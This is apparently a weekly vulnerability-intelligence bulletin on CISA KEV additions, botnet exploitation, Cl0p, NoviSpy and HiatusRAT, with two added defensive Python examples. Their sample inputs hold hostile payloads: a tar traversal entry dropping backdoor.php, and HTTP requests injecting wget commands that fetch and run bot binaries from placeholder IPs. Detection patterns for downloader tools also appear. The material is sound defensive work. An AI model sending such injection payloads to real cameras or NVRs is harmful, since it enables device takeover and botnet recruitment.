Executive Summary
This week saw the addition of eight vulnerabilities to the CISA Known Exploited Vulnerabilities (KEV) catalog, spotlighting a mix of new and legacy threats. Microsoft faced scrutiny over a high-severity flaw in its Windows Kernel-mode driver, while Adobe ColdFusion also saw a high-severity vulnerability added. BeyondTrust joined the list with a critical entry, underscoring the diverse attack surface. Cleo remains under pressure with another vulnerability added to the catalog following last week's entry. Additionally, the catalog now includes two legacy OS command injection vulnerabilities in Reolink IP cameras and two more in NUUO NVRmini devices, emphasizing the risk posed by unresolved legacy issues.
The surge in botnet activity has taken a sharp turn, with Zerobot launching attacks on Tenda WiFi routers and Andoryu exploiting vulnerabilities in GitLab systems. IoT Reaper and AndroxGh0st remain relentless, preying on outdated flaws in Cisco routers and PHPUnit. Adding to the wave of exploits, veteran botnets Mirai, Tsunami, BrickerBot, and Bashlite have zeroed in on an eight-year-old vulnerability in the Eir D1000 modem, underscoring the risks posed by legacy security gaps in critical infrastructure.
Ransomware and threat activity surged this week, with Cl0p ransomware operators claiming responsibility for attacks on Cleo products, showcasing their ongoing impact. The discovery of NoviSpy spyware leveraging Qualcomm zero-day vulnerabilities further highlights the sophistication of emerging threats. Additionally, the FBI issued a stark warning about HiatusRAT campaigns, which have expanded to target IoT devices, signaling a broadening of attack vectors.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insight into the latest emerging and widely discussed threats, helping defenders make informed prioritization decisions.
A vulnerability in the Microsoft Windows Kernel-mode Driver, involving an untrusted pointer dereference, allows an attacker who can already run code on the host to execute code with elevated privileges upon successful exploitation. Rated CVSS 7.8 (high), the vulnerability was disclosed and patched in Microsoft's June security update. While the vendor provided limited details at that time, the subsequent public release of a proof-of-concept (PoC) exploit has lowered the bar for attackers to weaponize it. Evidence of in-the-wild exploitation led to its inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring the urgency of patching.
An improper access control vulnerability in Adobe ColdFusion, with a CVSS score of 7.4, allows attackers to read or modify restricted files, potentially exposing sensitive information. This high-severity flaw affects ColdFusion 2023 (Update 6 and earlier) and ColdFusion 2021 (Update 12 and earlier). Its addition to the CISA Known Exploited Vulnerabilities (KEV) catalog signals active exploitation, and the availability of a public Proof of Concept (PoC) exploit further increases the risk, making prompt patching crucial.
A critical vulnerability (CVSS 9.8) has been identified in Cleo Harmony, VLTrader, and LexiCom, affecting versions prior to 5.8.0.24. The flaw allows unauthenticated users to import and execute arbitrary Bash or PowerShell commands on the host system, posing a severe risk of full system compromise. Because exploitation has been confirmed, the vulnerability was recently added to the CISA Known Exploited Vulnerabilities (KEV) catalog; organizations running affected versions should upgrade immediately rather than rely on network exposure alone.
A critical command injection vulnerability (CVSS 9.8) has been identified in BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) products, affecting versions 24.3.1 and earlier. Now added to the CISA Known Exploited Vulnerabilities (KEV) catalog, the flaw enables attackers to execute arbitrary operating system commands on the affected system, significantly escalating the risk to environments that depend on these appliances for privileged access.
A missing authentication vulnerability in NUUO NVRmini 2 devices (versions through 3.11) allows unauthenticated attackers to upload an encrypted TAR archive, because the handle_import_user.php function performs no authentication check; the archive contents can then be used to add arbitrary users. When chained with another vulnerability (CVE-2011-5325, a directory traversal in BusyBox tar extraction), attackers can overwrite arbitrary files under the web root, ultimately achieving code execution with root privileges. This critical flaw has recently been added to the CISA KEV catalog, highlighting the urgent need for mitigation.
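The second half of that chain is a generic weakness worth checking for in any firmware or web application that accepts uploaded archives: tar members whose names or link targets climb out of the extraction directory. The following Python, added here as an example and not code from NUUO or from the original bulletin, inspects an in-memory archive for the three escape patterns (absolute names, '..' traversal, symlinks or hardlinks resolving outside the root) and refuses to extract if any are present. The sample archive contents are constructed for the example.

```python
import io
import posixpath
import tarfile


def escapes_root(path: str) -> bool:
    """True if a tar member path would land outside the extraction directory.

    Catches absolute paths and any '..' component that climbs above the root
    after normalisation ('www/../../etc/passwd' is caught, 'www/../x' is not).
    """
    if path.startswith("/"):
        return True
    norm = posixpath.normpath(path)
    return norm == ".." or norm.startswith("../")


def unsafe_tar_members(archive_bytes: bytes) -> list:
    """Return the names of members that would escape the extraction root.

    Three patterns are flagged: absolute member names, '..' traversal in the
    member name, and symlinks or hardlinks whose target resolves outside the
    root (the symlink case is the BusyBox tar weakness referenced above).
    """
    findings = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tar:
        for member in tar.getmembers():
            if escapes_root(member.name):
                findings.append(member.name)
                continue
            if member.issym() or member.islnk():
                target = member.linkname
                if not target.startswith("/"):
                    # Relative link targets resolve against the member's own directory.
                    target = posixpath.join(posixpath.dirname(member.name), target)
                if escapes_root(target):
                    findings.append(f"{member.name} -> {member.linkname}")
    return findings


def safe_extract(archive_bytes: bytes, dest: str) -> None:
    """Refuse the whole archive if any member is unsafe, otherwise extract it."""
    bad = unsafe_tar_members(archive_bytes)
    if bad:
        raise ValueError(f"refusing to extract archive with unsafe members: {bad}")
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tar:
        tar.extractall(dest)


def build_archive(members) -> bytes:
    """Build a tar archive in memory from constructed sample members.

    Each member is (name, data) for a regular file or (name, None, linkname)
    for a symlink. Used only to generate example input; not real attacker data.
    """
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for member in members:
            info = tarfile.TarInfo(name=member[0])
            if member[1] is None:
                info.type = tarfile.SYMTYPE
                info.linkname = member[2]
                tar.addfile(info)
            else:
                info.size = len(member[1])
                tar.addfile(info, io.BytesIO(member[1]))
    return buf.getvalue()


# Constructed sample: one legitimate user-import file, one traversal entry
# aimed at the web root, and one symlink pointing above the extraction root.
SAMPLE_MEMBERS = [
    ("users/import.csv", b"admin,$1$placeholder\n"),
    ("../../var/www/html/backdoor.php", b"<?php /* attacker-controlled */ ?>"),
    ("www/link", None, "../../etc"),
]


if __name__ == "__main__":
    archive = build_archive(SAMPLE_MEMBERS)
    print(unsafe_tar_members(archive))
```

The check runs over the member table before anything touches disk, so a single bad entry rejects the whole upload rather than leaving a partially extracted archive behind. Python 3.12 and later offer a built-in `filter="data"` argument to `extractall` that enforces similar rules; the explicit version above works on older interpreters and makes the rejection reason visible in logs.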
A critical OS command injection vulnerability in Reolink RLC-410W IP cameras (firmware version 3.0.0.136_20121102) has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. With a CVSS score of 9.8, the flaw allows attackers to inject OS commands through the camera's network settings functionality via crafted HTTP requests. Updating the firmware, and keeping the camera's management interface off the public internet, is essential to mitigate this threat.
Also recently added to the CISA Known Exploited Vulnerabilities (KEV) catalog, this five-year-old OS command injection vulnerability impacts multiple Reolink IP camera models, including RLC-410W, C1 Pro, C2 Pro, RLC-422W, and RLC-511W. It allows an authenticated administrator to abuse the "TestEmail" functionality to inject and execute OS commands as root. Although administrator credentials are required, weak or reused passwords on internet-exposed cameras make that precondition a low bar in practice.
Recently added to the CISA Known Exploited Vulnerabilities (KEV) catalog, a six-year-old OS command injection vulnerability in NUUO NVRmini devices allows remote code execution. Rated CVSS 9.8, the flaw lies in the upgrade_handle.php script, where shell metacharacters in the uploaddir parameter of the writeuploaddir command reach the shell unsanitized. This entry underscores the importance of inventorying and isolating legacy devices to mitigate critical security risks.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As a source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in MISP. The top 5 CVEs with payloads suggestive of botnet activity, such as wget fetches from raw IP addresses, are presented.
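The NUUO and Reolink command-injection entries in the trending section and the "wget with a raw IP address" payload signature described here can be detected with the same request-level logic. The following Python is an added example, not code from the bulletin or from the Cytellite sensor pipeline: it decodes HTTP request targets and bodies and tags the NUUO writeuploaddir/uploaddir pattern, a TestEmail command carrying shell metacharacters, and downloader payloads that fetch from a dotted-quad IP. The parameter names cmd, writeuploaddir and uploaddir and the TestEmail command name come from the advisory text; the api.cgi path, the JSON body layout and the sample requests themselves are constructed assumptions for the example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Shell metacharacters that separate or substitute commands in a POSIX shell.
SHELL_META = re.compile(r"[;|`]|\$\(|&&")

# A fetch tool followed (lazily, on the same line) by a dotted-quad IP.
# Botnet droppers typically pull stage-two binaries from bare IPs, not hostnames.
DOWNLOADER = re.compile(
    r"\b(?:wget|curl|tftp)\b[^\n]*?(?:https?://|ftp://)?(?:\d{1,3}\.){3}\d{1,3}", re.I
)


def decode_request(target: str, body: str):
    """Split a request target into path and decoded query parameters.

    Values are decoded a second time so a double-encoded ';' (%253B) is still
    seen as a metacharacter, a common filter-evasion trick.
    """
    url = urlsplit(target)
    path = unquote_plus(url.path)
    params = {
        key: [unquote_plus(v) for v in values]
        for key, values in parse_qs(url.query, keep_blank_values=True).items()
    }
    return path, params, unquote_plus(body)


def classify(method: str, target: str, body: str = "") -> list:
    """Return detection tags for one HTTP request (empty list if nothing matched)."""
    tags = []
    path, params, decoded_body = decode_request(target, body)
    haystack = " ".join(v for values in params.values() for v in values) + " " + decoded_body

    # NUUO NVRmini: writeuploaddir command on upgrade_handle.php with a
    # metacharacter in uploaddir (parameter names taken from the advisory text).
    if path.endswith("upgrade_handle.php") and "writeuploaddir" in params.get("cmd", []):
        if any(SHELL_META.search(v) for v in params.get("uploaddir", [])):
            tags.append("nuuo-nvrmini-uploaddir-injection")

    # Reolink: TestEmail command carrying a metacharacter in the request body.
    # The api.cgi path and JSON body shape are assumptions for this example.
    if "TestEmail" in params.get("cmd", []) and SHELL_META.search(decoded_body):
        tags.append("reolink-testemail-injection")

    if DOWNLOADER.search(haystack):
        tags.append("botnet-downloader-payload")

    # Catch-all for injection attempts against endpoints not modelled above.
    if SHELL_META.search(haystack) and not any(t.endswith("-injection") for t in tags):
        tags.append("generic-shell-metachar")
    return tags


def scan(requests) -> list:
    """Classify a sequence of (method, target, body) tuples, preserving order."""
    return [classify(*req) for req in requests]


# Constructed sample requests (not sensor telemetry). 192.0.2.0/24 and
# 198.51.100.0/24 are documentation ranges, not real infrastructure.
SAMPLE_REQUESTS = [
    ("GET", "/api/users?page=2", ""),
    ("GET", "/upgrade_handle.php?cmd=writeuploaddir"
            "&uploaddir=%60wget+http%3A%2F%2F192.0.2.10%2Fbot.sh%60", ""),
    ("POST", "/cgi-bin/api.cgi?cmd=TestEmail",
     '[{"cmd":"TestEmail","param":{"Email":{"smtpServer":"smtp.example.com;id;"}}}]'),
    ("GET", "/cgi-bin/login.cgi?user=admin%3Bwget+http%3A%2F%2F198.51.100.7%2Fbins%2Farm7%3Bsh+arm7", ""),
    ("GET", "/api/upload?dir=/var/www/uploads&name=report.csv", ""),
]


if __name__ == "__main__":
    for (method, target, _), tags in zip(SAMPLE_REQUESTS, scan(SAMPLE_REQUESTS)):
        print(f"{method} {target[:60]:<60} {tags}")
```

The endpoint-specific tags are deliberately narrow so they can be trusted for alerting, while the generic metacharacter tag is noisy by design and is better used for hunting. Note that the TestEmail case needs the request body, which a standard access log does not record; the sensor or reverse proxy has to capture bodies for that rule to fire.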
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually analyzed and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites, and more.
Cl0p Ransomware Claims Responsibility for Cleo Attacks
SecurityWeek confirmed that Cl0p representatives have claimed responsibility for the recent attacks on Cleo products. The attacks were initially attributed to a new ransomware group called Termite, with some cybersecurity experts speculating about a link between Termite and Cl0p, potentially positioning Termite as Cl0p's successor. However, Rapid7 researchers have noted that it is still possible that multiple threat groups were involved in the attacks.
NoviSpy Spyware leveraging Qualcomm Zero-day vulnerabilities
The Serbian government has been linked to the exploitation of Qualcomm zero-day vulnerabilities to deploy a new spyware, dubbed 'NoviSpy', targeting activists, journalists, and protestors. Discovered by Amnesty International's Security Lab on a journalist's phone after it was returned by the police, NoviSpy was attributed to Serbian authorities based on its command-and-control communications. Researchers shared exploit artifacts with Google's Threat Analysis Group (TAG), which identified vulnerabilities in Qualcomm's DSP (Digital Signal Processor) driver, specifically the 'adsprpc' driver used for multimedia processing. While Google has not confirmed exactly which vulnerabilities were exploited, the evidence indicates that NoviSpy relies on an exploit chain that bypasses Android security mechanisms to gain kernel-level privileges and install itself persistently.
HiatusRAT Exploiting Web Cameras and DVRs
The FBI has issued a warning that HiatusRAT campaigns have expanded their scope beyond outdated network edge devices, such as routers, to target Internet of Things (IoT) devices, specifically web cameras and DVRs from manufacturers such as Hikvision, D-Link, and Dahua. Activity has been observed in the U.S., Australia, Canada, New Zealand, and the United Kingdom. HiatusRAT, a Remote Access Trojan (RAT) active since at least July 2022, gives its operators remote control of compromised devices. The latest iterations show a broader and more aggressive targeting approach, emphasizing the need for stronger IoT security measures, starting with patching or isolating internet-exposed cameras and recorders.
PRE-NVD observed for this week
Pre-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database (NVD). The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand coverage.
External References
- https://www.cisa.gov/news-events/alerts/2024/12/17/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.cisa.gov/news-events/alerts/2024/12/16/cisa-adds-two-known-exploited-vulnerabilities-catalog
- https://www.cisa.gov/news-events/alerts/2024/12/19/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.cisa.gov/news-events/alerts/2024/12/18/cisa-adds-four-known-exploited-vulnerabilities-catalog
- https://vulnera.com/newswire/serbian-government-linked-to-novispy-spyware-exploiting-qualcomm-zero-day-vulnerabilities/
- https://securitylab.amnesty.org/latest/2024/12/a-digital-prison-surveillance-and-the-suppression-of-civil-society-in-serbia/
- https://www.bleepingcomputer.com/news/security/new-android-novispy-spyware-linked-to-qualcomm-zero-day-bugs/
- https://thehackernews.com/2024/12/novispy-spyware-installed-on.html?m=1
- https://thehackernews.com/2024/12/cisa-and-fbi-raise-alerts-on-exploited.html
- https://www.ic3.gov/CSA/2024/241216.pdf